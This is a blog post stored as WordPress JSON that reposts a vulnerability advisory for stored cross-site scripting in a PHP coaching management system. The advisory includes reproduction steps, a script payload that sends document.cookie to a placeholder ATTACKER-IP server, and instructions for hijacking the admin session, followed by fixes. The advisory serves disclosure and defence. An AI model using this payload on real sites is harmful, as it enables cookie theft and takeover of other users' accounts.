{"id":50204,"date":"2026-04-29T12:45:26","date_gmt":"2026-04-29T12:45:26","guid":{"rendered":"http:\/\/localhost\/?p=50204"},"modified":"2026-04-29T12:45:26","modified_gmt":"2026-04-29T12:45:26","slug":"coaching-management-system-10-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50204","title":{"rendered":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047"},"content":{"rendered":"

{“lastseen”:”2026-04-29T17:06:35″,”description”:”Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220047″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7222″],”sourceData”:”### Stored Cross-Site Scripting (XSS) in Coaching Management System Leads to Account Takeover\\n \\n —\\n \\n ## Product\\n \\n Coaching Management System in PHP (Code-Projects.org)\\n https:\/\/code-projects.org\/coaching-management-system-in-php-with-source-code\/\\n \\n —\\n \\n ## Affected Components\\n \\n * \/modules\/student\/complaint.php (Complaint Submission)\\n * \/modules\/admin\/incomingcomplaint.php (Complaint Viewing)\\n * Complaint Reply Functionality (Admin\/Teacher \u2192 Student)\\n \\n —\\n \\n ## Version\\n \\n Unknown (No version information provided by the vendor; tested on the latest available version from Code-Projects.org as of April 2026)\\n \\n —\\n \\n ## Vulnerability Type\\n \\n CWE-79: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)\\n \\n —\\n \\n ## Description\\n \\n The application fails to properly sanitize user-supplied input in the complaint and reply functionality. Malicious JavaScript injected by a low-privileged user is stored and executed when viewed by higher-privileged users such as administrators or teachers.\\n \\n Additionally, the reply functionality is also vulnerable, allowing administrators or teachers to inject JavaScript that executes in student sessions.\\n \\n This results in stored XSS vulnerability affecting multiple user roles.\\n \\n —\\n \\n ## Steps to Reproduce\\n \\n ### Case 1: Student \u2192 Admin (Privilege Escalation)\\n \\n 1. Login as Student\\n 2. Navigate to:\\n \/modules\/student\/complaint.php\\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-10 212940\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/2e6e72ed-bd2f-4e77-850a-a0b0f28a6aba\\” \/\\u003e\\n \\n 4. Submit a complaint with the following payload:\\n \\n “`html\\n \\u003cscript\\u003e\\n new Image().src=\\”http:\/\/ATTACKER-IP:PORT\/?c=\\”+document.cookie;\\n \\u003c\/script\\u003e\\n “`\\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-10 213341\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/dbddb6ef-6380-403e-91da-fc8012d0d08b\\” \/\\u003e\\n \\n \\n 4. Login as Admin\\n 5. Navigate to:\\n \/modules\/admin\/incomingcomplaint.php\\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-10 212951\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/c4e07392-a5ff-4885-8f5f-ac5e1da4ac25\\” \/\\u003e\\n \\n 7. When the admin views the complaint, the payload executes automatically\\n 8. The admin session cookie is sent to the attacker-controlled server\\n 9. Use the stolen session cookie to hijack the admin session\\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-10 213350\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/432fa992-6147-4abb-b37d-11e8f84c7fb4\\” \/\\u003e\\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-10 213406\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/935f3cda-c802-401b-bd6d-8a6783078586\\” \/\\u003e\\n \\n \\n —\\n \\n ### Case 2: Admin \u2192 Student (Reverse XSS)\\n \\n 1. Login as Admin\\n 2. Reply to a complaint using payload:\\n \\n “`html\\n \\u003cimg src=x onerror=alert(window.location)\\u003e\\n “`\\n \\n 3. Login as Student\\n 4. View the complaint reply\\n \\n —\\n \\n ## Proof of Concept Evidence\\n \\n * JavaScript execution confirmed in admin panel upon viewing malicious complaint\\n * Session cookie (PHPSESSID) successfully exfiltrated via attacker-controlled server\\n * Admin session hijacked using stolen cookie\\n * JavaScript execution confirmed in student panel via reply functionality\\n \\n —\\n \\n ## Impact\\n \\n * Low-privileged users (students) can execute arbitrary JavaScript in admin context\\n * Leads to session hijacking due to absence of HttpOnly flag\\n * Full administrative account takeover\\n * Bidirectional XSS allows compromise of multiple roles (Admin, Teacher, Student)\\n * Complete compromise of application integrity, confidentiality, and availability\\n \\n Severity: CRITICAL\\n \\n —\\n \\n ## Root Cause\\n \\n * Lack of input sanitization\\n * Absence of output encoding\\n * Missing security controls on session cookies (HttpOnly flag not set)\\n \\n —\\n \\n ## Recommendation\\n \\n * Sanitize and validate all user inputs.\\n * Encode output using functions like htmlspecialchars() in PHP\\n * Set HttpOnly and Secure flags on session cookies\\n * Implement Content Security Policy (CSP)\\n \\n —“,”sourceHref”:”https:\/\/packetstorm.news\/download\/220047″,”cvss”:{“score”:5.1,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:P\/VC:N\/SC:N\/VI:L\/SI:N\/VA:N\/SA:N\/E:P”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:N\/I:L\/A:N\/E:P\/RC:R”,”baseScore”:3.5,”baseSeverity”:”LOW”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”LOW”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”NONE”,”integrityImpact”:”LOW”,”availabilityImpact”:”NONE”}},”href”:”https:\/\/packetstorm.news\/files\/id\/220047\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-29T17:06:35″,”description”:”Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220047″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7222″],”sourceData”:”### Stored Cross-Site Scripting (XSS) in…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,109,12,21,13,53,7,11,5],"class_list":["post-50204","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-51","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50204\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-29T17:06:35″,”description”:”Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220047″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7222″],”sourceData”:”### Stored Cross-Site Scripting (XSS) in...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50204\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T12:45:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047\",\"datePublished\":\"2026-04-29T12:45:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204\"},\"wordCount\":820,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.1\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50204#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204\",\"name\":\"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T12:45:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50204\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50204#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50204","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem","og_description":"{“lastseen”:”2026-04-29T17:06:35″,”description”:”Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220047″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7222″],”sourceData”:”### Stored Cross-Site Scripting (XSS) in...","og_url":"https:\/\/zero.redgem.net\/?p=50204","og_site_name":"zero redgem","article_published_time":"2026-04-29T12:45:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50204#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50204"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047","datePublished":"2026-04-29T12:45:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50204"},"wordCount":820,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.1","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50204#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50204","url":"https:\/\/zero.redgem.net\/?p=50204","name":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T12:45:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50204#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50204"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50204#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50204"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50204\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}